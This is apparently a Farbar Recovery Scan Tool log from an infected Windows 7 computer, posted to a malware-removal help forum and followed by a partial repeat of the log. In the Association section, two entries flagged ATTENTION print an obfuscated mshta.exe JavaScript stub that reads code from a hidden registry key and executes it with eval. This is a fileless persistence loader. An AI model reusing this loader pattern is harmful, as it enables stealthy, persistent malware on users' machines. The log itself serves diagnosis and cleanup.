Additional scan result of Farbar Recovery Scan Tool (x86) Version: 15-03-2017
Ran by hilton (13-04-2017 12:35:25)
Running from C:\Users\hilton\Downloads
Microsoft Windows 7 Professional Service Pack 1 (X86) (2016-06-29 20:30:51)
Boot Mode: Normal
==========================================================
==================== Accounts: =============================
Administrator (S-1-5-21-3292114827-816517840-1514174382-500 - Administrator - Disabled)
Guest (S-1-5-21-3292114827-816517840-1514174382-501 - Limited - Disabled)
hilton (S-1-5-21-3292114827-816517840-1514174382-1000 - Administrator - Enabled) => C:\Users\hilton
HomeGroupUser$ (S-1-5-21-3292114827-816517840-1514174382-1002 - Limited - Enabled)
==================== Security Center ========================
(If an entry is included in the fixlist, it will be removed.)
AV: Avast Antivirus (Enabled - Up to date) {8EA8924E-BC81-DC44-8BB0-8BAE75D86EBF}
AS: Windows Defender (Disabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Avast Antivirus (Enabled - Up to date) {35C973AA-9ABB-D3CA-B100-B0DC0E5F2402}
FW: Avast Antivirus (Enabled) {B693136B-F6EE-DD1C-A0EF-229B8B0B29C4}
==================== Installed Programs ======================
(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
Adobe Acrobat Reader DC (HKLM\...\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}) (Version: 17.009.20044 - Adobe Systems Incorporated)
Adobe Flash Player 25 ActiveX (HKLM\...\Adobe Flash Player ActiveX) (Version: 25.0.0.148 - Adobe Systems Incorporated)
Amazon Music (HKU\S-1-5-21-3292114827-816517840-1514174382-1000\...\Amazon Amazon Music) (Version: 5.3.5.1704 - Amazon Services LLC)
Avast Internet Security (HKLM\...\Avast Antivirus) (Version: 17.3.2291 - AVAST Software)
Canon MG3200 series MP Drivers (HKLM\...\{1199FAD5-9546-44f3-81CF-FFDB8040B7BF}_Canon_MG3200_series) (Version: - Canon Inc.)
Canon Quick Menu (HKLM\...\CanonQuickMenu) (Version: 2.7.1 - Canon Inc.)
CCleaner (HKLM\...\CCleaner) (Version: 5.28 - Piriform)
Dell System Detect (HKU\S-1-5-21-3292114827-816517840-1514174382-1000\...\58d94f3ce2c27db0) (Version: 7.11.0.6 - Dell)
DriverUpdate (HKLM\...\DriverUpdate) (Version: 4.0.0 - Slimware Utilities Holdings, Inc.)
DriverUpdate (Version: 4.0.0 - Slimware Utilities Holdings, Inc.) Hidden
eM Client (HKLM\...\{2A4CAF55-4B18-4B61-BE9E-94A54209F547}) (Version: 7.0.27943.0 - eM Client Inc.)
FromDocToPDF Internet Explorer Homepage and New Tab (HKU\S-1-5-21-3292114827-816517840-1514174382-1000\...\FromDocToPDFTooltab Uninstall Internet Explorer) (Version: - Mindspark Interactive Network, Inc.) <==== ATTENTION
Google Chrome (HKLM\...\Google Chrome) (Version: 57.0.2987.133 - Google Inc.)
Google Update Helper (Version: 1.3.33.3 - Google Inc.) Hidden
Intel(R) Graphics Media Accelerator Driver (HKLM\...\HDMI) (Version: 8.15.10.1930 - Intel Corporation)
Intel(R) Management Engine Interface (HKLM\...\HECI) (Version: - Intel Corporation)
Intel(R) Network Connections 19.5.303.0 (HKLM\...\PROSetDX) (Version: 19.5.303.0 - Intel)
Intel(R) Wireless Bluetooth(R)(patch version 19.0.1629.3590) (HKLM\...\{302600C1-6BDF-4FD1-1603-148929CC1385}) (Version: 19.0.1603.0650 - Intel Corporation)
Intel® Active Management Technology (HKLM\...\MESOL) (Version: - Intel Corporation)
Kodi (HKU\S-1-5-21-3292114827-816517840-1514174382-1000\...\Kodi) (Version: - XBMC-Foundation)
Microsoft .NET Framework 4.6.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.6.01055 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.50906.0 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.23026 (HKLM\...\{74d0e5db-b326-4dae-a6b2-445b9de1836e}) (Version: 14.0.23026.0 - Microsoft Corporation)
Mozilla Firefox 52.0 (x86 en-US) (HKLM\...\Mozilla Firefox 52.0 (x86 en-US)) (Version: 52.0 - Mozilla)
Mozilla Maintenance Service (HKLM\...\MozillaMaintenanceService) (Version: 52.0.0.6270 - Mozilla)
OpenOffice 4.1.3 (HKLM\...\{EEA30AEB-8BA7-465B-85D4-098BB99733E7}) (Version: 4.13.9783 - Apache Software Foundation)
RoboForm 8-3-1-1 (All Users) (HKLM\...\AI RoboForm) (Version: 8-3-1-1 - Siber Systems)
SafeZone Stable 3.55.2393.590 (Version: 3.55.2393.590 - Avast Software) Hidden
SafeZone Stable 3.55.2393.596 (Version: 3.55.2393.596 - Avast Software) Hidden
Samsung USB Driver for Mobile Phones (HKLM\...\{D0795B21-0CDA-4a92-AB9E-6E92D8111E44}) (Version: 1.5.61.0 - Samsung Electronics Co., Ltd.)
SoundMAX (HKLM\...\{F0A37341-D692-11D4-A984-009027EC0A9C}) (Version: 6.10.1.7280 - Analog Devices)
Stardock Fences 3 (HKLM\...\Stardock Fences 3) (Version: 3.03 - Stardock Software, Inc.)
Stardock ObjectDock (HKLM\...\Stardock ObjectDock) (Version: 2.20 - Stardock Software, Inc.)
WIDCOMM Bluetooth Software (HKLM\...\{A1439D4F-FD46-47F2-A1D3-FEE097C29A09}) (Version: 6.5.1.2700 - Broadcom Corporation)
Windows Mobile Device Center (HKLM\...\{904CCF62-818D-4675-BC76-D37EB399F917}) (Version: 6.1.6965.0 - Microsoft Corporation)
Windows Mobile Device Center Driver Update (HKLM\...\{E7044E25-3038-4A76-9064-344AC038043E}) (Version: 6.1.6965.0 - Microsoft Corporation)
==================== Custom CLSID (Whitelisted): ==========================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
==================== Scheduled Tasks (Whitelisted) =============
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
Task: {0FEEAAD8-76C7-4B2C-8F73-A21BB9D814D3} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files\Google\Update\GoogleUpdate.exe [2016-12-25] (Google Inc.)
Task: {224A052F-EE78-4A67-B44E-75C5338C2C0A} - System32\Tasks\SafeZone scheduled Autoupdate 1482114147 => C:\Program Files\AVAST Software\SZBrowser\launcher.exe [2017-03-22] (Avast Software)
Task: {2E1F1D2B-A7F0-47BE-9978-16429AE3489C} - System32\Tasks\Driver Support-RTMScan => C:\Program Files\Driver Support\DriverSupport.exe [2016-06-07] (PC Drivers Headquarters)
Task: {2E451AE4-8D27-484B-B16F-D509AF77F27D} - System32\Tasks\Driver Support => C:\Program Files\Driver Support\DriverSupport.exe [2016-06-07] (PC Drivers Headquarters)
Task: {599B1B91-94BB-47B7-B9DB-8C9A5FAB8A12} - System32\Tasks\Avast Emergency Update => C:\Program Files\AVAST Software\Avast\AvEmUpdate.exe [2017-04-12] (AVAST Software)
Task: {6782147C-F074-4313-B1B6-20D506A59457} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2017-02-02] (Adobe Systems Incorporated)
Task: {69879873-87A5-4A6E-947D-918B26EA1025} - System32\Tasks\Driver Support-RTMUpdater => C:\Program Files\Driver Support\DriverSupport.exe [2016-06-07] (PC Drivers Headquarters)
Task: {7165A1B7-F1E6-4C37-BB48-9ABE90C6D3E3} - System32\Tasks\DriverUpdate Scan => C:\Program Files\DriverUpdate\DriverUpdate.exe [2016-08-01] (SlimWare Utilities, Inc.)
Task: {9B71B164-D984-4853-BA08-95A906000F12} - System32\Tasks\Open URL by RoboForm => Rundll32.exe url.dll,FileProtocolHandler "hxxps://www.roboform.com/test-pass.html?aaa=KICMKMKMNJHMOMGMNMJJCNPMNJMJMJCNLMJMHMKMCNOJOMOJLJCNPMJJNMHMOMOJMMJJMJHMJMOJJNJICMHMCNMMCNOMFMOMOMCNPMCNGMJMPMPMFMJMCNOMCNIMJMPMOMCNNMJNPICMPMFMEKMICNJJCKFMNMHMJMJNHICMOMPMKJCJMIJNBJCMHJGJDJLIAJBJJNKJCMJNNICMJNDJCMKJBJJNMJCMPMF (the data entry has 42 more characters).
Task: {A432DC7B-B85A-4B9D-970A-1E7753295BF1} - System32\Tasks\Run RoboForm TaskBar Icon => C:\Program Files\Siber Systems\AI RoboForm\RoboTaskBarIcon.exe [2017-04-12] (Siber Systems)
Task: {ACA2CFD2-877B-4148-BCDB-579CDEBD6855} - System32\Tasks\Games\UpdateCheck_S-1-5-21-3292114827-816517840-1514174382-1000
Task: {AEBAC022-C4BF-468A-A3B0-A99EF616D1AA} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files\Google\Update\GoogleUpdate.exe [2016-12-25] (Google Inc.)
Task: {B65BA30C-B2B6-46F4-B376-2009DA700634} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2017-03-03] (Piriform Ltd)
Task: {BF5F61F7-5B68-424F-BC5D-73C6030B203E} - System32\Tasks\AVAST Software\Avast settings backup => C:\Program Files\Common Files\AV\avast! Antivirus\backup.exe [2017-01-27] (AVAST Software)
Task: {C24F7343-825C-44A5-A240-4432598C8B17} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe [2017-04-12] (Adobe Systems Incorporated)
Task: {E572A5EE-C9B3-477C-B58F-EE074238EB6E} - System32\Tasks\DriverUpdate Startup.job => C:\Program Files\DriverUpdate\DriverUpdate.exe [2016-08-01] (SlimWare Utilities, Inc.)
Task: {E753F27A-B7AA-4831-A49E-9186D40D7565} - System32\Tasks\Driver Support-RTMRules => C:\Program Files\Driver Support\DriverSupport.exe [2016-06-07] (PC Drivers Headquarters)
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
Task: C:\Windows\Tasks\DriverUpdate Scan.job => C:\Program Files\DriverUpdate\DriverUpdate.exe
==================== Shortcuts =============================
(The entries could be listed to be restored or removed.)
==================== Loaded Modules (Whitelisted) ==============
2017-04-12 14:40 - 2017-04-12 14:40 - 00170216 _____ () C:\Program Files\AVAST Software\Avast\JsonRpcServer.dll
2017-04-12 14:40 - 2017-04-12 14:40 - 00176480 _____ () C:\Program Files\AVAST Software\Avast\event_routing_rpc.dll
2017-04-12 14:40 - 2017-04-12 14:40 - 00653520 _____ () C:\Program Files\AVAST Software\Avast\ffl2.dll
2017-04-12 14:40 - 2017-04-12 14:40 - 00230632 _____ () C:\Program Files\AVAST Software\Avast\streamback.dll
2017-04-13 07:45 - 2017-04-13 07:45 - 06015544 _____ () C:\Program Files\AVAST Software\Avast\defs\17041300\algo.dll
2017-04-12 14:39 - 2017-04-12 14:39 - 00134920 _____ () c:\Program Files\AVAST Software\Avast\vaarclient.dll
2017-04-12 14:40 - 2017-04-12 14:40 - 00230632 _____ () c:\Program Files\AVAST Software\Avast\StreamBack.dll
2016-07-28 13:02 - 2016-07-28 13:02 - 00093528 _____ () C:\Program Files\DriverUpdate\CrashRpt.dll
2016-12-18 22:20 - 2016-12-18 22:20 - 48936448 _____ () C:\Program Files\AVAST Software\Avast\libcef.dll
2017-04-12 14:39 - 2017-04-12 14:39 - 00293936 _____ () C:\Program Files\AVAST Software\Avast\gaming_mode_ui.dll
2016-08-01 10:37 - 2016-08-01 10:37 - 00076120 _____ () C:\Program Files\SlimWare Utilities\Services\CrashRpt.dll
==================== Alternate Data Streams (Whitelisted) =========
(If an entry is included in the fixlist, only the ADS will be removed.)
AlternateDataStreams: C:\Users\hilton\Desktop\AmazonSmil.website
ESTICON_favicon-321416266 [37438]
AlternateDataStreams: C:\Users\hilton\Desktop\AmazonSmil.websiteESTICON_favicon-36986836 [37438]
AlternateDataStreams: C:\Users\hilton\Desktop\AmazonSmil.websiteESTICON_favicon1520975912 [37438]
AlternateDataStreams: C:\Users\hilton\Desktop\AmazonSmil.websiteESTICON_favicon62545966 [37438]
AlternateDataStreams: C:\Users\hilton\Desktop\AmazonSmil.websiteESTICON_favicon825986531 [37438]
AlternateDataStreams: C:\Users\hilton\Desktop\AmazonSmil.websiteESTICON_Goldbox16._CB200960310_-1866390539 [2814]
AlternateDataStreams: C:\Users\hilton\Desktop\AmazonSmil.website:TASKICON_0favicon-919252660 [37438]
AlternateDataStreams: C:\Users\hilton\Desktop\AmazonSmil.website:TASKICON_1favicon871367106 [37438]
AlternateDataStreams: C:\Users\hilton\Desktop\AmazonSmil.website:TASKICON_2favicon717581649 [37438]
AlternateDataStreams: C:\Users\hilton\Desktop\AmazonSmil.website:TASKICON_3favicon364977008 [37438]
AlternateDataStreams: C:\Users\hilton\Desktop\AmazonSmil.website:TASKICON_4favicon-1245215657 [37438]
AlternateDataStreams: C:\Users\hilton\Desktop\BING.website:TASKICON_0sm_weather-1654153164 [2302]
AlternateDataStreams: C:\Users\hilton\Desktop\BING.website:TASKICON_1sm_news888331756 [2302]
AlternateDataStreams: C:\Users\hilton\Desktop\BING.website:TASKICON_2sm_maps-889989894 [2302]
==================== Safe Mode (Whitelisted) ===================
(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" value will be restored.)
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MCODS => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mcapexe => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\McNaiAnn => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeplk => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeplk.sys => ""="Driver"
==================== Association (Whitelisted) ===============
(If an entry is included in the fixlist, the registry item will be restored to default or removed.)
HKU\S-1-5-21-3292114827-816517840-1514174382-1000\Software\Classes\49c4f: "C:\Windows\system32\mshta.exe" "javascript:WJc2I4C="TtZ";I7o0=new ActiveXObject("WScript.Shell");ivp77AS="IJm09";n30PTY=I7o0.RegRead("HKCU\\software\\jtosjykc\\khzqgpmhk");Wdq2Upz="eTw";eval(n30PTY);zfuWFiF0="36B";" <===== ATTENTION
HKU\S-1-5-21-3292114827-816517840-1514174382-1000\Software\Classes\89873: "C:\Windows\system32\mshta.exe" "javascript:A2FZidrE="CPVI";S19T=new ActiveXObject("WScript.Shell");phe0u="W1NGquh";OsT4c0=S19T.RegRead("HKCU\\software\\ovbrx\\adbychucad");bE4RCT="yLuy";eval(OsT4c0);siDwFRU9="iAbe";" <===== ATTENTION
==================== Internet Explorer trusted/restricted ===============
(If an entry is included in the fixlist, it will be removed from the registry.)
IE trusted site: HKU\S-1-5-21-3292114827-816517840-1514174382-1000\...\dell.com -> dell.com
==================== Hosts content: ===============================
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
2009-07-13 22:04 - 2016-07-17 14:58 - 00000824 ____A C:\Windows\system32\Drivers\etc\hosts
==================== Other Areas ============================
(Currently there is no automatic fix for this section.)
HKU\S-1-5-21-3292114827-816517840-1514174382-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\hilton\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg
DNS Servers: 209.18.47.61 - 209.18.47.62
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall is enabled.
==================== MSCONFIG/TASK MANAGER disabled items ==
==================== FirewallRules (Whitelisted) ===============
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
FirewallRules: [SPPSVC-In-TCP] => (Allow) %SystemRoot%\system32\sppsvc.exe
FirewallRules: [SPPSVC-In-TCP-NoScope] => (Allow) %SystemRoot%\system32\sppsvc.exe
FirewallRules: [{0DC8D093-6A4A-46DF-81F7-51A31BA38190}] => (Allow) C:\Windows\Microsoft.NET\Framework\v4.0.30319\SMSvcHost.exe
FirewallRules: [TCP Query User{AC689693-B971-449C-8EA9-AC51E5D70F9C}C:\users\hilton\appdata\local\amazon music\amazon music helper.exe] => (Allow) C:\users\hilton\appdata\local\amazon music\amazon music helper.exe
FirewallRules: [UDP Query User{25F20FE1-CB5D-4B09-9160-3C9094A6B8A8}C:\users\hilton\appdata\local\amazon music\amazon music helper.exe] => (Allow) C:\users\hilton\appdata\local\amazon music\amazon music helper.exe
FirewallRules: [{EAD2EC74-0D35-4D3D-900E-D48B9AB5AE26}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe
FirewallRules: [{E8207517-F4F1-4084-AD6C-988A4CDC999F}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe
FirewallRules: [{8F434A18-CE8D-45DC-AD17-44370BA521AC}] => (Allow) C:\Program Files\AVAST Software\SZBrowser\3.55.2393.561\SZBrowser.exe
FirewallRules: [{0941F852-CFCF-4D18-A6F8-20FE7A5ACEC5}] => (Allow) C:\Program Files\AVAST Software\SZBrowser\3.55.2393.596_0\SZBrowser.exe
FirewallRules: [{30AFA8FF-C296-4B9A-AD9E-55C4A601D1BB}] => (Allow) C:\Program Files\Google\Chrome\Application\chrome.exe
==================== Restore Points =========================
05-04-2017 00:00:04 Scheduled Checkpoint
12-04-2017 03:00:16 Windows Update
12-04-2017 14:06:47 Restore Operation
12-04-2017 15:19:46 Windows Update
==================== Faulty Device Manager Devices =============
Name: avast! SecureLine TAP Adapter v3
Description: avast! SecureLine TAP Adapter v3
Class Guid: {4d36e972-e325-11ce-bfc1-08002be10318}
Manufacturer: TAP-Windows Provider V9
Service: aswTap
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.
==================== Event log errors: =========================
Application errors:
==================
Error: (04/13/2017 12:33:33 PM) (Source: LMS) (EventID: 2) (User: NT AUTHORITY)
Description: LMS Service lost connection to HECI driver
Error: (04/13/2017 11:10:02 AM) (Source: LMS) (EventID: 2) (User: NT AUTHORITY)
Description: LMS Service lost connection to HECI driver
Error: (04/13/2017 11:08:16 AM) (Source: LMS) (EventID: 2) (User: NT AUTHORITY)
Description: LMS Service lost connection to HECI driver
Error: (04/12/2017 04:06:07 PM) (Source: SideBySide) (EventID: 33) (User: )
Description: Activation context generation failed for "C:\Program Files\DriverUpdate\MFC80U.DLL".
Dependent Assembly Microsoft.VC80.MFCLOC,processorArchitecture="x86",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0" could not be found.
Please use sxstrace.exe for detailed diagnosis.
Error: (04/12/2017 04:05:49 PM) (Source: SideBySide) (EventID: 33) (User: )
Description: Activation context generation failed for "C:\Program Files\DriverUpdate\MFC80U.DLL".
Dependent Assembly Microsoft.VC80.MFCLOC,processorArchitecture="x86",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0" could not be found.
Please use sxstrace.exe for detailed diagnosis.
Error: (04/12/2017 04:03:30 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.
Error: (04/12/2017 03:19:46 PM) (Source: VSS) (EventID: 8193) (User: )
Description: Volume Shadow Copy Service error: Unexpected error calling routine ConvertStringSidToSid(S-1-5-21-3292114827-816517840-1514174382-1000.bak). hr = 0x80070539, The security ID structure is invalid.
.
Operation:
OnIdentify event
Gathering Writer Data
Context:
Execution Context: Shadow Copy Optimization Writer
Writer Class Id: {4dc3bdd4-ab48-4d07-adb0-3bee2926fd7f}
Writer Name: Shadow Copy Optimization Writer
Writer Instance ID: {460ea05d-9812-4601-ba62-5d80b9e346fa}
Error: (04/12/2017 03:19:44 PM) (Source: Microsoft-Windows-User Profiles Service) (EventID: 1533) (User: NT AUTHORITY)
Description: Windows cannot delete the profile directory C:\Users\TEMP. This error may be caused by files in this directory being used by another program.
DETAIL - The directory is not empty.
Error: (04/12/2017 03:18:15 PM) (Source: SideBySide) (EventID: 33) (User: )
Description: Activation context generation failed for "C:\Program Files\DriverUpdate\MFC80U.DLL".
Dependent Assembly Microsoft.VC80.MFCLOC,processorArchitecture="x86",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0" could not be found.
Please use sxstrace.exe for detailed diagnosis.
Error: (04/12/2017 03:18:09 PM) (Source: ESENT) (EventID: 215) (User: )
Description: WinMail (3740) WindowsMail0: The backup has been stopped because it was halted by the client or the connection with the client failed.
System errors:
=============
Error: (04/13/2017 10:34:20 AM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)
Description: The following fatal alert was received: 20.
Error: (04/13/2017 10:34:13 AM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)
Description: The following fatal alert was received: 20.
Error: (04/12/2017 03:18:25 PM) (Source: Service Control Manager) (EventID: 7024) (User: )
Description: The HomeGroup Listener service terminated with service-specific error %%-2147023143 = There are no more endpoints available from the endpoint mapper..
Error: (04/12/2017 03:07:57 PM) (Source: Disk) (EventID: 7) (User: )
Description: The device, \Device\Harddisk0\DR0, has a bad block.
Error: (04/12/2017 03:07:54 PM) (Source: Disk) (EventID: 7) (User: )
Description: The device, \Device\Harddisk0\DR0, has a bad block.
Error: (04/12/2017 03:07:34 PM) (Source: Disk) (EventID: 7) (User: )
Description: The device, \Device\Harddisk0\DR0, has a bad block.
Error: (04/12/2017 03:07:31 PM) (Source: Disk) (EventID: 7) (User: )
Description: The device, \Device\Harddisk0\DR0, has a bad block.
Error: (04/12/2017 03:07:05 PM) (Source: Disk) (EventID: 7) (User: )
Description: The device, \Device\Harddisk0\DR0, has a bad block.
Error: (04/12/2017 03:07:03 PM) (Source: Disk) (EventID: 7) (User: )
Description: The device, \Device\Harddisk0\DR0, has a bad block.
Error: (04/12/2017 03:02:45 PM) (Source: Disk) (EventID: 7) (User: )
Description: The device, \Device\Harddisk0\DR0, has a bad block.
==================== Memory info ===========================
Processor: Intel(R) Core(TM)2 CPU 6300 @ 1.86GHz
Percentage of memory in use: 44%
Total physical RAM: 3316.61 MB
Available physical RAM: 1847.67 MB
Total Virtual: 6631.55 MB
Available Virtual: 5076.47 MB
==================== Drives ================================
Drive c: (Windows) (Fixed) (Total:1859.99 GB) (Free:1818.73 GB) NTFS
==================== MBR & Partition Table ==================
========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 1863 GB) (Disk ID: F9D26468)
Partition 1: (Active) - (Size=3 GB) - (Type=27)
Partition 2: (Not Active) - (Size=1860 GB) - (Type=07 NTFS)
==================== End of Addition.txt ============================
hope this works...
thanks
hefs
Ran by hilton (13-04-2017 12:35:25)
Running from C:\Users\hilton\Downloads
Microsoft Windows 7 Professional Service Pack 1 (X86) (2016-06-29 20:30:51)
Boot Mode: Normal
==========================================================
==================== Accounts: =============================
Administrator (S-1-5-21-3292114827-816517840-1514174382-500 - Administrator - Disabled)
Guest (S-1-5-21-3292114827-816517840-1514174382-501 - Limited - Disabled)
hilton (S-1-5-21-3292114827-816517840-1514174382-1000 - Administrator - Enabled) => C:\Users\hilton
HomeGroupUser$ (S-1-5-21-3292114827-816517840-1514174382-1002 - Limited - Enabled)
==================== Security Center ========================
(If an entry is included in the fixlist, it will be removed.)
AV: Avast Antivirus (Enabled - Up to date) {8EA8924E-BC81-DC44-8BB0-8BAE75D86EBF}
AS: Windows Defender (Disabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Avast Antivirus (Enabled - Up to date) {35C973AA-9ABB-D3CA-B100-B0DC0E5F2402}
FW: Avast Antivirus (Enabled) {B693136B-F6EE-DD1C-A0EF-229B8B0B29C4}
==================== Installed Programs ======================
(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
Adobe Acrobat Reader DC (HKLM\...\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}) (Version: 17.009.20044 - Adobe Systems Incorporated)
Adobe Flash Player 25 ActiveX (HKLM\...\Adobe Flash Player ActiveX) (Version: 25.0.0.148 - Adobe Systems Incorporated)
Amazon Music (HKU\S-1-5-21-3292114827-816517840-1514174382-1000\...\Amazon Amazon Music) (Version: 5.3.5.1704 - Amazon Services LLC)
Avast Internet Security (HKLM\...\Avast Antivirus) (Version: 17.3.2291 - AVAST Software)
Canon MG3200 series MP Drivers (HKLM\...\{1199FAD5-9546-44f3-81CF-FFDB8040B7BF}_Canon_MG3200_series) (Version: - Canon Inc.)
Canon Quick Menu (HKLM\...\CanonQuickMenu) (Version: 2.7.1 - Canon Inc.)
CCleaner (HKLM\...\CCleaner) (Version: 5.28 - Piriform)
Dell System Detect (HKU\S-1-5-21-3292114827-816517840-1514174382-1000\...\58d94f3ce2c27db0) (Version: 7.11.0.6 - Dell)
DriverUpdate (HKLM\...\DriverUpdate) (Version: 4.0.0 - Slimware Utilities Holdings, Inc.)
DriverUpdate (Version: 4.0.0 - Slimware Utilities Holdings, Inc.) Hidden
eM Client (HKLM\...\{2A4CAF55-4B18-4B61-BE9E-94A54209F547}) (Version: 7.0.27943.0 - eM Client Inc.)
FromDocToPDF Internet Explorer Homepage and New Tab (HKU\S-1-5-21-3292114827-816517840-1514174382-1000\...\FromDocToPDFTooltab Uninstall Internet Explorer) (Version: - Mindspark Interactive Network, Inc.) <==== ATTENTION
Google Chrome (HKLM\...\Google Chrome) (Version: 57.0.2987.133 - Google Inc.)
Google Update Helper (Version: 1.3.33.3 - Google Inc.) Hidden
Intel(R) Graphics Media Accelerator Driver (HKLM\...\HDMI) (Version: 8.15.10.1930 - Intel Corporation)
Intel(R) Management Engine Interface (HKLM\...\HECI) (Version: - Intel Corporation)
Intel(R) Network Connections 19.5.303.0 (HKLM\...\PROSetDX) (Version: 19.5.303.0 - Intel)
Intel(R) Wireless Bluetooth(R)(patch version 19.0.1629.3590) (HKLM\...\{302600C1-6BDF-4FD1-1603-148929CC1385}) (Version: 19.0.1603.0650 - Intel Corporation)
Intel® Active Management Technology (HKLM\...\MESOL) (Version: - Intel Corporation)
Kodi (HKU\S-1-5-21-3292114827-816517840-1514174382-1000\...\Kodi) (Version: - XBMC-Foundation)
Microsoft .NET Framework 4.6.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.6.01055 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.50906.0 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.23026 (HKLM\...\{74d0e5db-b326-4dae-a6b2-445b9de1836e}) (Version: 14.0.23026.0 - Microsoft Corporation)
Mozilla Firefox 52.0 (x86 en-US) (HKLM\...\Mozilla Firefox 52.0 (x86 en-US)) (Version: 52.0 - Mozilla)
Mozilla Maintenance Service (HKLM\...\MozillaMaintenanceService) (Version: 52.0.0.6270 - Mozilla)
OpenOffice 4.1.3 (HKLM\...\{EEA30AEB-8BA7-465B-85D4-098BB99733E7}) (Version: 4.13.9783 - Apache Software Foundation)
RoboForm 8-3-1-1 (All Users) (HKLM\...\AI RoboForm) (Version: 8-3-1-1 - Siber Systems)
SafeZone Stable 3.55.2393.590 (Version: 3.55.2393.590 - Avast Software) Hidden
SafeZone Stable 3.55.2393.596 (Version: 3.55.2393.596 - Avast Software) Hidden
Samsung USB Driver for Mobile Phones (HKLM\...\{D0795B21-0CDA-4a92-AB9E-6E92D8111E44}) (Version: 1.5.61.0 - Samsung Electronics Co., Ltd.)
SoundMAX (HKLM\...\{F0A37341-D692-11D4-A984-009027EC0A9C}) (Version: 6.10.1.7280 - Analog Devices)
Stardock Fences 3 (HKLM\...\Stardock Fences 3) (Version: 3.03 - Stardock Software, Inc.)
Stardock ObjectDock (HKLM\...\Stardock ObjectDock) (Version: 2.20 - Stardock Software, Inc.)
WIDCOMM Bluetooth Software (HKLM\...\{A1439D4F-FD46-47F2-A1D3-FEE097C29A09}) (Version: 6.5.1.2700 - Broadcom Corporation)
Windows Mobile Device Center (HKLM\...\{904CCF62-818D-4675-BC76-D37EB399F917}) (Version: 6.1.6965.0 - Microsoft Corporation)
Windows Mobile Device Center Driver Update (HKLM\...\{E7044E25-3038-4A76-9064-344AC038043E}) (Version: 6.1.6965.0 - Microsoft Corporation)
==================== Custom CLSID (Whitelisted): ==========================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
